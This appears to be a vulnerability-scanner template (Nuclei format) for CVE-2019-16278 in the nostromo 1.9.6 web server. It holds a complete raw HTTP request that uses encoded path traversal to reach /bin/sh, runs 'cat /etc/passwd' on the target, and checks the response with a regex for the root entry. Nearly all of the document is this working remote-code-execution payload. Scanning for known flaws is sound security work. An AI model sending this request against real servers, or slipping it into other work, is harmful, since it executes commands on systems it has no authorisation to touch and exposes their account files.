id: CVE-2019-16278

info:
  author: pikpikcu
  name: nostromo 1.9.6 - Remote Code Execution
  severity: critical
  reference: https://www.exploit-db.com/raw/47837
  tags: cve,cve2019,rce

requests:
  - raw:
      - |
        POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
        Content-Length: 1
        Connection: close

        echo
        echo
        cat /etc/passwd 2>&1

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"